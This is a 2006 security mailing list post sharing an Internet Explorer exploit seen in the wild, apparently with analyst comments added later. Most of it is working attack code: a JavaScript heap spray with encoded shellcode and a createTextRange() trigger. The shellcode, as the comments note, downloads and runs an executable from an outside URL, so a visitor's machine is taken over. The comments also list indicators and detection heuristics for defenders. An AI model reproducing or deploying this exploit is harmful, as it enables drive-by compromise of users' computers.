Dailydave mailing list archives

IE attack...


From: Dave Aitel <dave () immunityinc com>
Date: Sat, 25 Mar 2006 11:41:08 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
So this is the IE attack various sites are owning people with...I
stumbled on it while browsing random things. It's been a pretty bad
week for IE this week. Of course, it's been a pretty bad year for IE.
Been a pretty bad time all around for IE. Motto: "Giving Host
Intrusion Prevention vendors case study after case study."

I don't know why the other lists aren't posting this. Maybe there was
a memo that went around where you try to keep people from knowing what
they're actually at risk from.

- -dave

<input type="checkbox" id="blah">
<SCRIPT language="java script">

shellcode = unescape(  
 
"%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6300%u6c61%u2e63%u7865%u0065%u6f4d%u697a%u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170%u6974%u6c62%u3b65%u4d20%u4953%u2045%u2e35%u3130%u203b%u6957%u646e%u776f%u2073%u544e%u3520%u302e%u0029%u6977%u696e%u656e%u2e74%u6c64%u006c%u0000%u0000%u0000%u0000%u0000%u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e65%u0041%u6e49%u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u4900%u746e%u7265%u656e%u5274%u6165%u4664%u6c69%u0065%u6e49%u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61%u6c64%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u7468%u7074%u2f3a%u772f%u7777%u662e%u6c75%u666c%u7461%u6b73%u6e69%u796e%u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6058%ud08b%u33fc%u64c0%u408b%u8b30%u0
c40%u708b%uad1c%u688b%u5208%u5252%u5252%u5252%u5252%u5252%u5252%u79bb%ue741%u5288%u0068%u0002%ue800%u0191%u0000%u8b5f%u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000%ua4f2%ubb5a%u7959%u4773%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852%u0161%u0000%ue85a%u014b%u0000%u4289%u8304%u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00%uc21b%u3b10%ue85a%u012f%u0000%u0289%uc283%u5210%ue850%u0133%u0000%u815a%ue8c2%u0003%u8300%u09c2%u006a%u006a%u006a%u006a%uff52%u5ad0%u08e8%u0001%u8900%u0842%u028b%u1bbb%u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00%ueee8%u0000%u8b00%u8bd8%u0842%uc281%u00a8%u0000%u006a%u0068%u0000%u6a80%u6a00%u5200%uff50%u5ad3%ucee8%u0000%u8900%u0842%u028b%u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000%u8b00%u5af0%ub2e8%u0000%u8b00%u087a%uca8b%uc183%u5a0c%u5256%u5151%ue868%u0003%u5200%uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02%u5a2a%u5251%ue852%u0087%u0000%uda8b%uc383%u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056%u4fbb%u6a47%ue807%u007b%u0000%u595a%ueb5e%u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776%ued00%ue850%u0061%u0000%ubb5a%u4179%u88e7%u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b%uf803%uc681%u03e8%u0000%u09b9%u0000%uf200%u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b%uc783%uc710%u1047%u0044%u0000%u21bb%u05d0%u57d0%u5056%u6a50%u5020%u5050%u5250%u12e8%u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2%uc283%u8334%u0cc2%u53c3%u5756%u458b%u8b3c%u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0%u41c9%u348b%u038a%u33f5%uc1ff%u13cf%u03ac%u85f8%u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5%u5b5e%ue0ff");

    // Heap-fill stage followed by the trigger call. Everything below only builds
    // large strings and stores them in an array; the single DOM call on the last
    // line is the operation the post describes as the IE attack.
    //
    // Analyst note: the `shellcode` string assigned above contains readable
    // little-endian text in its %uXXXX pairs: "calc.exe", the User-Agent
    // "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)", "wininet.dll",
    // the import names InternetOpenA / InternetOpenUrlA / InternetReadFile /
    // InternetCloseHandle, and the URL hxxp://www.fullfatskinny[.]com/ca.exe
    // (defanged here). These strings suggest a WinINet fetch of that URL; this
    // is inferred from the strings, not from disassembly, so confirm before
    // relying on it. The URL and User-Agent are usable as proxy/DNS log
    // indicators.

    // Filler unit: two UTF-16 code units of 0x9090, i.e. four 0x90 bytes
    // (0x90 is the x86 NOP opcode).
    bigblock = unescape("%u9090%u9090");
    // Space reserved per string: the payload length plus 20 code units.
    slackspace = 20 + shellcode.length

    // Double the filler until it is at least slackspace code units long.
    while (bigblock.length < slackspace)
        bigblock += bigblock;

    // fillblock: exactly slackspace code units of filler.
    fillblock = bigblock.substring(0, slackspace);

    // block: the remainder of the filler once slackspace units are set aside.
    block = bigblock.substring(0, bigblock.length-slackspace);

    // Grow block until block plus slackspace reaches at least 0x40000 code units.
    while(block.length + slackspace < 0x40000)
        block = block + block + fillblock;

    // Holds references to the large strings so they stay allocated.
    memory = new Array();

    // 2020 entries, each the filler block followed by the payload string.
    // Detection note: unescape() of %u9090 filler, string-doubling loops up to a
    // fixed large size, and an array of many identical large strings form the
    // pattern that script-inspection and host intrusion prevention heuristics
    // typically key on.
    for ( i = 0; i < 2020; i++ )
        memory[i] = block + shellcode;

    // Calls createTextRange() on the checkbox <input id="blah"> declared above
    // the script; the result `r` is never used. NOTE(review): presumably this
    // call is the fault trigger; the post names no advisory or patch identifier,
    // so match it against the vendor bulletin before writing a rule. The sample
    // depends on script execution in the browser.
    var r = document.getElementById('blah').createTextRange();

</script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 
iD8DBQFEJXKktehAhL0gheoRApFMAJkBqhCnj2NTvVZ30sJUhhk/2gwkpgCcChNa
CNw1qWJPIKuPDBFaPZDW47U=
=+Vsq
-----END PGP SIGNATURE-----


